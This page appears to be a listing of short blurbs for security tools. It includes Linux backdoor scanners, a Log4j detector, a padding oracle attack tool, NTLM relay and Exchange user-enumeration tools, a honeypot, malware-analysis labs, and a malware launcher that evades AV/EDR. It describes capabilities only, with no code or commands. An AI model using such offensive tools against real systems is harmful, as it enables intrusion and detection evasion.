RCLocals : Linux Startup Analyzer
RCLocals is inspired by 'Autoruns' from Sysinternals, RCLocals analyzes all Linux startup possibilities to find backdoors, also performs process integrity verification, scan for DLL injected processes and much more Things covered: ·List GPG keys trusted by the system ·Installed Packages ·File integrity ·Process integrity (process and libraries loaded in a process that not belongs to any installed package) ·Processes with name spoofed (processes that use prctl() to...
Log4J-Detect : Script To Detect The “Log4j” Java Library Vulnerability For A List Of URLs With Multithreading
Log4J-Detect is a script "log4j-detect.py" developed in Python 3 is responsible for detecting whether a list of URLs are vulnerable to CVE-2021-44228. To do so, it sends a GET request using threads (higher performance) to each of the URLs in the specified list. The GET request contains a payload that on success returns a DNS request to Burp Collaborator /...
Rustpad : Multi-Threaded Padding Oracle Attacks Against Any Service
Rustpad is a multi-threaded successor to the classic padbuster, written in Rust. It abuses a Padding Oracle vulnerability to decrypt any cypher text or encrypt arbitrary plain text without knowing the encryption key! Features Decryption of cypher textsEncryption of arbitrary plain textMulti-threading on both block and byte levelModern, real-time and interactive TUI!No-TTY support, so you can just pipe output to a fileSupports Web server oracles...... and Script-based oracles. For...
SyntheticSun : A Defense-In-Depth Security Automation And Monitoring Framework
SyntheticSun is a defense-in-depth security automation and monitoring framework which utilizes threat intelligence, machine learning, managed AWS security services and, serverless technologies to continuously prevent, detect and respond to threats. You sleep in fragmented glassWith reflections of you,But are you feeling alive?Yeah let me ask you,Are you feeling alive? Synopsis Uses event- and time-based serverless automation (e.g. AWS CodeBuild, AWS Lambda) to...
Msmailprobe : Office 365 And Exchange Enumeration
Msmailprobe is widely known that OWA (Outlook Web app) is vulnerable to time-based user enumeration attacks. This tool leverages all known, and even some lesser-known services exposed by default Exchange installations to enumerate users. It also targets Office 365 for error-based user enumeration. Getting Started If you want to download and compile the simple, non-dependant code, you must first install GoLang!...
RPC Firewall : Stopping Lateral Movement via the RPC Firewall
RPC Firewall is the underlying mechanism which is used for numerous lateral movement techniques, reconnaissances, relay attacks, or simply to exploit vulnerable RPC services. DCSync attack? over RPC. Remote DCOM? over RPC. WMIC? over RPC. SharpHound? over RPC. PetitPotam? over RPC. PsExec? over RPC. ZeroLogon? over RPC... well, you get the idea :) What is it used for? Research Install the RPC Firewall and configure it to audit all remote RPC...
Lsarelayx : NTLM Relaying For Windows Made Easy
Lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on. lsarelayx will relay any incoming authentication request which includes SMB. Since lsarelayx hooks into existing application authentication flows, the tool will also attempt to service the original authentication request after the relay is complete. This will prevent the target application/protocol...
RiotPot : Resilient IoT And Operational Technology Honeypot
RiotPot is an interoperable medium interaction honeypot, primarily focused on the emulation IoT and OT protocols, although, it is also capable of emulating other services. This services are loaded in the honeypot in the form of plugins, making RIoTPot a modular, and very transportable honeypot. The services are loaded at runtime, meaning that the weight of the honeypot will vary...
Skrull : A Malware DRM, That Prevents Automatic Sample Submission By AV/EDR
Skrull is a malware DRM, that prevents Automatic Sample Submission by AV/EDR and Signature Scanning from Kernel. It generates launchers that can run malware on the victim using the Process Ghosting technique. Also, launchers are totally anti-copy and naturally broken when got submitted. Video Demo Download
PMAT-labs : Labs For Practical Malware Analysis And Triage
PMAT-labs, this repository contains live malware samples for use in the Practical Malware Analysis & Triage course (PMAT). These samples are either written to emulate common malware characteristics or are live, real world, "caught in the wild" samples. Both categories are dangerous. These samples are to be handled with extreme caution at all times. Do not download these samples to...
